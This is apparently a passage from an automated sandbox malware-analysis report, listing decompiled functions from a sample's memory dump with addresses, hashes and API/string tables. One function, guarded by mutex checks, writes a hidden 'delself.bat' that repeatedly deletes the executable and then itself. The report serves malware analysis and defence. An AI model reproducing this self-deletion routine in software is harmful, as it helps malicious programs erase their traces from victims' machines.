										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}

0x00420f30
0x00420f37
0x00420f8c
0x00420f8c
0x00420f39
0x00420f39
0x00420f3f
0x00420f49
0x00420f61
0x00420f61
0x00420f64
0x00420f78
0x00420f78
0x00420f7b
0x00000000
0x00420f7d
0x00420f7d
0x00420f7d
0x00420f7f
0x00420f84
0x00000000
0x00000000
0x00420f86
0x00420f89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00420f89
0x00000000
0x00420f7d
0x00420f66
0x00420f73
0x00420f92
0x00420f94
0x00420fa2
0x00420fab
0x00000000
0x00420fad
0x00420fb0
0x00420fb2
0x00420fdc
0x00420fb4
0x00420fb4
0x00420fb6
0x00420fd6
0x00420fb8
0x00420fbb
0x00420fbd
0x00420fd0
0x00420fbf
0x00420fc1
0x00000000
0x00420fc3
0x00000000
0x00420fc3
0x00420fc1
0x00420fbd
0x00420fb6
0x00420fb2
0x00000000
0x00420f8d
0x00420f8d
0x00420f8d
0x00000000
0x00420f77
0x00420f4b
0x00420f4b
0x00420f4b
0x00420f4d
0x00420f52
0x00000000
0x00000000
0x00420f54
0x00420f57
0x00000000
0x00420f59
0x00420f5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00420f5f
0x00000000
0x00420f57
0x00420fc6
0x00420fca
0x00420fca
0x00420f49
0x00000000

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 4d4153effdc54993d1d24102320792f46c30032caadd031e430906af4f03bf0d
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 191178773C10B143D634CA2DF6B46F7A3E5EFC5320BAF43ABD0418B756D2AAA8419508

Uniqueness

Uniqueness Score: -1.00%

Function 0040A660 Relevance: .1, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0040A660(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed char _t62;
				signed char _t65;
				signed char _t66;
				void* _t69;
				signed char _t70;
				signed char _t72;
				unsigned char _t88;
				void* _t92;

				_push(__ecx);
				_t69 = __ecx + 2;
				_t92 = 4;
				do {
					_t70 =  *((intOrPtr*)(_t69 + 1));
					_t69 = _t69 + 4;
					_t72 = _t70 ^  *(_t69 - 4);
					_t65 =  *(_t69 - 5);
					_v6 = 0x1b;
					_v7 = _t72;
					_v5 = _t72 ^ 0x0000001b ^ _t65;
					 *(_t69 - 6) = 0x0000001b ^ ((0x0000001b ^ _t65) >> 0x00000007) * ((0x0000001b ^ _t65) >> 0x00000007) >> 0x00000020 ^ _v6 ^ _v5;
					_t66 = _v5;
					 *(_t69 - 5) = ((_t65 ^ _t65) >> 0x00000007) * 0x0000001b ^ ((_t65 ^ _t65) >> 0x00000007) * ((_t65 ^ _t65) >> 0x00000007) >> 0x00000020 ^ _t65 ^ _t66;
					_t88 = _v7 ^ _v6;
					 *(_t69 - 4) = 0x0000001b ^ _t88 ^ _t66 ^ _t66;
					_t62 = (_t88 >> 0x00000007) * 0x0000001b ^ (_t88 >> 0x00000007) * (_t88 >> 0x00000007) >> 0x00000020 ^ _v7 ^ _t66;
					 *(_t69 - 3) = _t62;
					_t92 = _t92 - 1;
				} while (_t92 != 0);
				return _t62;
			}

0x0040a663
0x0040a666
0x0040a669
0x0040a670
0x0040a670
0x0040a673
0x0040a67e
0x0040a680
0x0040a685
0x0040a688
0x0040a691
0x0040a6af
0x0040a6c1
0x0040a6c6
0x0040a6d7
0x0040a6e0
0x0040a6f1
0x0040a6f3
0x0040a6f6
0x0040a6f6
0x0040a702

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction ID: 12798de650c464c34aa3778ce5e64fe04281c395c40e5146a0d3500761537530
Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction Fuzzy Hash: 7E113D0A8492C4BDCF424A7840E56EBEFA58E37218F4A71DA88C45B753D01B190FE7A1

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004124E0() {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				char _v364;
				char _v628;
				void _v1668;
				char _v1932;
				char _v2956;
				long _t40;
				signed int _t48;
				void* _t78;
				intOrPtr _t79;
				int _t104;
				long _t106;
				int _t108;
				void* _t110;
				intOrPtr* _t113;
				void* _t115;

				if( *0x513234 == 0) {
					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
					_t40 = GetLastError();
					_push( *0x513230);
					if(_t40 != 0xb7) {
						CloseHandle();
						 *0x513230 = 0;
						goto L7;
					} else {
						_t104 = CloseHandle();
						 *0x513230 = 0;
						return _t104;
					}
				} else {
					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
					_t106 = GetLastError();
					_push( *0x513238);
					if(_t106 != 0xb7) {
						CloseHandle();
						 *0x513238 = 0;
						L7:
						if(E00412360() == 0) {
							GetModuleFileNameA(0,  &_v628, 0x104);
							GetShortPathNameA( &_v628,  &_v628, 0x104);
							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
							asm("sbb eax, eax");
							lstrcpyA( &_v364, _t48 &  &_v1932);
							lstrcatA( &_v364, "\\");
							lstrcatA( &_v364, "delself.bat");
							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\"\r\nif exist \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\" goto try\r\n");
							lstrcatA( &_v1668, "del \"");
							lstrcatA( &_v1668,  &_v364);
							lstrcatA( &_v1668, "\"");
							if(PathFileExistsA( &_v364) != 0) {
								DeleteFileA( &_v364);
							}
							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
							_t113 =  &_v1668;
							_t110 = _t78;
							_t115 = _t113 + 1;
							do {
								_t79 =  *_t113;
								_t113 = _t113 + 1;
							} while (_t79 != 0);
							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
							FlushFileBuffers(_t110);
							CloseHandle(_t110);
							E0042B420( &_v100, 0, 0x44);
							_v100.cb = 0x44;
							_v100.dwFlags = 1;
							_v100.wShowWindow = 0;
							SetLastError(0);
							lstrcpyA( &_v2956, "\"");
							lstrcatA( &_v2956,  &_v364);
							lstrcatA( &_v2956, "\"");
							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
							CloseHandle(_v24.hThread);
							return CloseHandle(_v24);
						} else {
							return E00412440();
						}
					} else {
						_t108 = CloseHandle();
						 *0x513238 = 0;
						return _t108;
					}
				}
			}

0x004124f3
0x00412556
0x0041255b
0x00412561
0x0041256c
0x0041258b
0x0041258d
0x00000000
0x0041256e
0x0041256e
0x00412574
0x00412584
0x00412584
0x004124f5
0x00412504
0x00412509
0x0041250f
0x0041251a
0x00412539
0x0041253b
0x00412597
0x0041259e
0x004125ba
0x004125cd
0x004125e4
0x004125fa
0x00412606
0x0041261a
0x00412628
0x00412636
0x00412646
0x00412654
0x00412664
0x00412672
0x00412680
0x00412690
0x0041269e
0x004126af
0x004126b8
0x004126b8
0x004126d7
0x004126dd
0x004126e3
0x004126e5
0x004126e8
0x004126e8
0x004126ea
0x004126eb
0x00412700
0x00412707
0x0041270e
0x00412718
0x00412720
0x00412729
0x00412730
0x00412735
0x00412747
0x0041275b
0x00412769
0x00412788
0x00412791
0x0041279e
0x004125a0
0x004125ab
0x004125ab
0x0041251c
0x0041251c
0x00412522
0x00412532
0x00412532
0x0041251a

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

"if exist ", xrefs: 00412648
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
delself.bat, xrefs: 0041261C
del ", xrefs: 00412674
D, xrefs: 00412720
TEMP, xrefs: 004125DF
@echo off:trydel ", xrefs: 0041262A
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
" goto try, xrefs: 00412666

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* __edi;
				void* __esi;
				signed int _t125;
				void* _t141;
				void* _t146;
				void* _t151;
				void* _t157;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t183;
				char _t186;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t206;
				intOrPtr _t210;
				intOrPtr _t218;
				void* _t219;
				intOrPtr _t222;
				intOrPtr _t224;
				char _t236;
				void* _t237;
				void* _t240;
				void* _t241;
				intOrPtr _t244;
				intOrPtr _t251;
				void* _t252;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t258;
				intOrPtr* _t261;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr* _t265;
				void* _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				signed int _t271;
				signed int _t272;
				void* _t274;
				void* _t275;
				void* _t279;
				void* _t280;
				void* _t284;

				_t247 = __edx;
				E0042F7C0(0x188);
				_t125 =  *0x50ad20; // 0x84f4da2
				_a388 = _t125 ^ _t271;
				_push(__ebx);
				_a16 = _a400;
				_push(__ebp);
				_a28 = _a404;
				_t251 = _a396;
				_a20 = _a408;
				_a12 = _t251;
				_a24 = _a412;
				_a4 = 0;
				_t236 = E0045AF30(__ebx, __edx, _t251);
				_a8 = _t236;
				_t257 = E0045AF30(_t236, __edx, _t251);
				_v0 = _t257;
				_t269 = E0045AF30(_t236, __edx, _t251);
				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
					E0045AD10(_t236);
					E0045AD10(_t257);
					E0045AD10(_t269);
					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
					_t272 = _t271 + 0x20;
					goto L72;
				} else {
					_a386 = 0;
					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
					_t274 = _t271 + 0xc;
					_t284 = _t141;
					if(_t284 <= 0) {
						L14:
						_push(0x2bf);
						_push(".\\crypto\\pem\\pem_lib.c");
						_push(0x6c);
						goto L15;
					} else {
						do {
							if(_t284 >= 0) {
								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
									_t141 = _t141 - 1;
									if(_t141 >= 0) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
							_t146 = _t141 + 2;
							if(_t146 >= 0x100) {
								L74:
								E0042AC83();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t251);
								_t253 = E0044F960(_t236, _t247, E004656B0());
								__eflags = _t253;
								if(__eflags != 0) {
									_push(_t257);
									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
									_push(_a4);
									_push(_v0);
									_push(_v4);
									_push(_v8);
									_push(_t253);
									_t151 = E00463C30(_t247, _t269);
									E0044F5E0(_t253);
									return _t151;
								} else {
									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
									__eflags = 0;
									return 0;
								}
							} else {
								 *((char*)(_t274 + _t146 + 0x98)) = 0;
								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
								_t279 = _t274 + 0xc;
								if(_t157 != 0) {
									goto L13;
								} else {
									_t261 =  &_a143;
									_t240 = _t261 + 1;
									do {
										_t159 =  *_t261;
										_t261 = _t261 + 1;
									} while (_t159 != 0);
									_t257 = _t261 - _t240;
									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
									_t279 = _t279 + 0xc;
									if(_t162 == 0) {
										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
										_t274 = _t279 + 8;
										__eflags = _t164;
										if(__eflags != 0) {
											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
											_t168 =  *((intOrPtr*)(_t236 + 4));
											_t236 = 0;
											 *((char*)(_t168 + _t257 - 6)) = 0;
											_t262 = _v0;
											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
											_t274 = _t274 + 0x14;
											__eflags = _t169;
											if(__eflags != 0) {
												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
												_t274 = _t274 + 0xc;
												__eflags = _t263;
												if(__eflags <= 0) {
													L32:
													_t264 = 0;
													__eflags = 0;
													goto L33;
												} else {
													do {
														if(__eflags >= 0) {
															while(1) {
																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
																	goto L27;
																}
																_t263 = _t263 - 1;
																__eflags = _t263;
																if(_t263 >= 0) {
																	continue;
																}
																goto L27;
															}
														}
														L27:
														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
														_t257 = _t263 + 2;
														__eflags = _t257 - 0x100;
														if(_t257 >= 0x100) {
															goto L74;
														} else {
															 *((char*)(_t274 + _t257 + 0x94)) = 0;
															__eflags = _a132 - 0xa;
															if(_a132 == 0xa) {
																goto L32;
															} else {
																_t251 = _t257 + _t236;
																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
																_t274 = _t274 + 8;
																__eflags = _t222;
																if(__eflags == 0) {
																	_push(0x2e4);
																	goto L22;
																} else {
																	_t224 = E00448190( &_a132, "-----END ", 9);
																	_t274 = _t274 + 0xc;
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_t251 = _a12;
																		_t264 = 1;
																		L33:
																		_a4 = 0;
																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
																		_t274 = _t274 + 8;
																		__eflags = _t173;
																		if(__eflags != 0) {
																			 *_a4 = 0;
																			__eflags = _t264;
																			if(_t264 != 0) {
																				_t251 = _t269;
																				_v0 = _t251;
																				_t269 = _v0;
																				_a4 = _t236;
																				goto L51;
																			} else {
																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
																				_t274 = _t274 + 0xc;
																				__eflags = _t267;
																				if(_t267 <= 0) {
																					L50:
																					_t251 = _v0;
																					L51:
																					_t236 = _a8;
																					_t265 =  *((intOrPtr*)(_t236 + 4));
																					_t83 = _t265 + 1; // 0x9
																					_t241 = _t83;
																					do {
																						_t176 =  *_t265;
																						_t265 = _t265 + 1;
																						__eflags = _t176;
																					} while (_t176 != 0);
																					_t266 = _t265 - _t241;
																					_t178 = E00448190( &_a132, "-----END ", 9);
																					_t274 = _t274 + 0xc;
																					__eflags = _t178;
																					if(__eflags != 0) {
																						L70:
																						_push(0x322);
																						_push(".\\crypto\\pem\\pem_lib.c");
																						_push(0x66);
																						goto L15;
																					} else {
																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
																						_t274 = _t274 + 0xc;
																						__eflags = _t180;
																						if(__eflags != 0) {
																							goto L70;
																						} else {
																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
																							_t274 = _t274 + 0xc;
																							__eflags = _t183;
																							if(__eflags != 0) {
																								goto L70;
																							} else {
																								E0047E5B0( &_a36);
																								_push(_a4);
																								_t186 = _a4;
																								_push(_t186);
																								_push( &_a4);
																								_push(_t186);
																								_push( &_a36);
																								_t188 = E0047E5D0();
																								_t274 = _t274 + 0x18;
																								__eflags = _t188;
																								if(__eflags >= 0) {
																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
																									_t275 = _t274 + 0xc;
																									__eflags = _t193;
																									if(__eflags >= 0) {
																										_t244 = _a4 + _a32;
																										__eflags = _t244;
																										_a4 = _t244;
																										if(_t244 == 0) {
																											goto L17;
																										} else {
																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
																											_t247 = _a20;
																											 *_a20 = _a4;
																											 *_a24 = _t244;
																											E00454C70(_t236);
																											E00454C70(_t251);
																											E00454C70(_t269);
																											_t272 = _t275 + 0xc;
																										}
																									} else {
																										_push(0x332);
																										_push(".\\crypto\\pem\\pem_lib.c");
																										_push(0x64);
																										goto L15;
																									}
																								} else {
																									_push(0x32c);
																									_push(".\\crypto\\pem\\pem_lib.c");
																									_push(0x64);
																									goto L15;
																								}
																							}
																						}
																					}
																					goto L73;
																				} else {
																					_t236 = 0;
																					__eflags = _t267;
																					do {
																						if(__eflags >= 0) {
																							while(1) {
																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
																									goto L44;
																								}
																								_t267 = _t267 - 1;
																								__eflags = _t267;
																								if(_t267 >= 0) {
																									continue;
																								}
																								goto L44;
																							}
																						}
																						L44:
																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
																						_t257 = _t267 + 2;
																						__eflags = _t257 - 0x100;
																						if(_t257 >= 0x100) {
																							goto L74;
																						} else {
																							__eflags = _t257 - 0x41;
																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
																							_t236 =  !=  ? 1 : _t236;
																							_t206 = E00448190( &_a132, "-----END ", 9);
																							_t274 = _t274 + 0xc;
																							__eflags = _t206;
																							if(_t206 == 0) {
																								goto L50;
																							} else {
																								__eflags = _t257 - 0x41;
																								if(_t257 > 0x41) {
																									goto L50;
																								} else {
																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
																									_t274 = _t274 + 8;
																									__eflags = _t210;
																									if(__eflags == 0) {
																										_push(0x303);
																										goto L22;
																									} else {
																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
																										_t280 = _t274 + 0xc;
																										_push(0xfe);
																										 *((char*)(_a4 + _t257 + _a4)) = 0;
																										_a4 = _a4 + _t257;
																										_push( &_a132);
																										_push(_t251);
																										__eflags = _t236;
																										if(_t236 != 0) {
																											_a132 = 0;
																											_t218 = E0044F780(_t251, _t269);
																											_t274 = _t280 + 0xc;
																											__eflags = _t218;
																											if(_t218 <= 0) {
																												goto L50;
																											} else {
																												while(1) {
																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
																														break;
																													}
																													_t218 = _t218 - 1;
																													__eflags = _t218;
																													if(_t218 >= 0) {
																														continue;
																													}
																													break;
																												}
																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
																												_t219 = _t218 + 2;
																												__eflags = _t219 - 0x100;
																												if(_t219 >= 0x100) {
																													goto L74;
																												} else {
																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
																													goto L50;
																												}
																											}
																										} else {
																											goto L49;
																										}
																									}
																								}
																							}
																						}
																						goto L77;
																						L49:
																						_t267 = E0044F780(_t251, _t269);
																						_t274 = _t280 + 0xc;
																						__eflags = _t267;
																					} while (__eflags > 0);
																					goto L50;
																				}
																			}
																		} else {
																			_push(0x2f1);
																			goto L22;
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
														goto L77;
														L31:
														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
														_t236 = _t251;
														_t251 = _a12;
														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
														_t274 = _t274 + 0x18;
														__eflags = _t263;
													} while (__eflags > 0);
													goto L32;
												}
											} else {
												_push(0x2d8);
												L22:
												_push(".\\crypto\\pem\\pem_lib.c");
												_push(0x41);
												_push(0x6d);
												_push(9);
												E004512D0(_t236, _t247, _t251, _t269, __eflags);
												_t236 = _a8;
												goto L16;
											}
										} else {
											_push(0x2ce);
											_push(".\\crypto\\pem\\pem_lib.c");
											_push(0x41);
											L15:
											_push(0x6d);
											_push(9);
											E004512D0(_t236, _t247, _t251, _t269, _t291);
											L16:
											_t275 = _t274 + 0x14;
											L17:
											E0045AD10(_t236);
											E0045AD10(_v0);
											E0045AD10(_t269);
											_t272 = _t275 + 0xc;
											L72:
											L73:
											_pop(_t252);
											_pop(_t258);
											_pop(_t237);
											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
										}
									} else {
										goto L13;
									}
								}
							}
							goto L77;
							L13:
							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
							_t274 = _t279 + 0xc;
							_t291 = _t141;
						} while (_t141 > 0);
						goto L14;
					}
				}
				L77:
			}

0x004635b0
0x004635b5
0x004635ba
0x004635c1
0x004635cf
0x004635d0
0x004635db
0x004635dc
0x004635e9
0x004635f0
0x004635fb
0x004635ff
0x00463603
0x00463610
0x00463612
0x0046361b
0x0046361d
0x00463626
0x0046362a
0x00463b6f
0x00463b75
0x00463b7b
0x00463b90
0x00463b95
0x00000000
0x00463640
0x0046364c
0x00463656
0x0046365b
0x0046365e
0x00463660
0x00463704
0x00463704
0x00463709
0x0046370e
0x00000000
0x00463666
0x00463666
0x00463666
0x00463670
0x0046367a
0x0046367b
0x00000000
0x00000000
0x00000000
0x0046367b
0x00463670
0x0046367d
0x0046367d
0x00463685
0x0046368d
0x00463bb3
0x00463bb3
0x00463bb8
0x00463bb9
0x00463bba
0x00463bbb
0x00463bbc
0x00463bbd
0x00463bbe
0x00463bbf
0x00463bc0
0x00463bcc
0x00463bd1
0x00463bd3
0x00463bf1
0x00463bfb
0x00463c00
0x00463c04
0x00463c08
0x00463c0c
0x00463c10
0x00463c11
0x00463c19
0x00463c25
0x00463bd5
0x00463be5
0x00463bed
0x00463bf0
0x00463bf0
0x00463693
0x00463695
0x004636aa
0x004636af
0x004636b4
0x00000000
0x004636b6
0x004636b6
0x004636bd
0x004636c0
0x004636c0
0x004636c2
0x004636c3
0x004636c7
0x004636da
0x004636df
0x004636e4
0x0046373e
0x00463743
0x00463746
0x00463748
0x00463767
0x0046376c
0x0046376f
0x00463776
0x0046377b
0x00463780
0x00463785
0x00463788
0x0046378a
0x004637b2
0x004637c2
0x004637c4
0x004637c7
0x004637c9
0x0046388c
0x0046388c
0x0046388c
0x00000000
0x004637cf
0x004637cf
0x004637cf
0x004637d1
0x004637d1
0x004637d9
0x00000000
0x00000000
0x004637db
0x004637db
0x004637dc
0x00000000
0x00000000
0x00000000
0x004637dc
0x004637d1
0x004637de
0x004637de
0x004637e6
0x004637e9
0x004637ef
0x00000000
0x004637f5
0x004637f5
0x004637fd
0x00463805
0x00000000
0x0046380b
0x0046380b
0x00463816
0x0046381b
0x0046381e
0x00463820
0x004638bd
0x00000000
0x00463826
0x00463835
0x0046383a
0x0046383d
0x0046383f
0x004638b2
0x004638b6
0x0046388e
0x00463894
0x0046389c
0x004638a1
0x004638a4
0x004638a6
0x004638ca
0x004638cd
0x004638cf
0x00463ace
0x00463ad0
0x00463ad4
0x00463ad6
0x00000000
0x004638d5
0x004638e8
0x004638ea
0x004638ed
0x004638ef
0x004639c4
0x004639c4
0x004639c8
0x004639c8
0x004639cc
0x004639cf
0x004639cf
0x004639d2
0x004639d2
0x004639d4
0x004639d5
0x004639d5
0x004639e2
0x004639ea
0x004639ef
0x004639f2
0x004639f4
0x00463b5d
0x00463b5d
0x00463b62
0x00463b67
0x00000000
0x004639fa
0x00463a06
0x00463a0b
0x00463a0e
0x00463a10
0x00000000
0x00463a16
0x00463a27
0x00463a2c
0x00463a2f
0x00463a31
0x00000000
0x00463a37
0x00463a3c
0x00463a41
0x00463a45
0x00463a4c
0x00463a4d
0x00463a4e
0x00463a53
0x00463a54
0x00463a59
0x00463a5c
0x00463a5e
0x00463af1
0x00463af6
0x00463af9
0x00463afb
0x00463b12
0x00463b12
0x00463b16
0x00463b1a
0x00000000
0x00463b20
0x00463b28
0x00463b31
0x00463b33
0x00463b3a
0x00463b40
0x00463b42
0x00463b48
0x00463b4e
0x00463b53
0x00463b56
0x00463afd
0x00463afd
0x00463b02
0x00463b07
0x00000000
0x00463b07
0x00463a64
0x00463a64
0x00463a69
0x00463a6e
0x00000000
0x00463a6e
0x00463a5e
0x00463a31
0x00463a10
0x00000000
0x004638f5
0x004638f5
0x004638f7
0x004638f9
0x004638f9
0x00463900
0x00463900
0x00463908
0x00000000
0x00000000
0x0046390a
0x0046390a
0x0046390b
0x00000000
0x00000000
0x00000000
0x0046390b
0x00463900
0x0046390d
0x0046390d
0x00463915
0x00463918
0x0046391e
0x00000000
0x00463924
0x00463924
0x00463927
0x00463936
0x00463946
0x0046394b
0x0046394e
0x00463950
0x00000000
0x00463952
0x00463952
0x00463955
0x00000000
0x00463957
0x00463962
0x00463967
0x0046396a
0x0046396c
0x00463ac0
0x00000000
0x00463972
0x00463983
0x0046398b
0x00463994
0x00463999
0x004639a4
0x004639a8
0x004639a9
0x004639aa
0x004639ac
0x00463a75
0x00463a7d
0x00463a82
0x00463a85
0x00463a87
0x00000000
0x00463a90
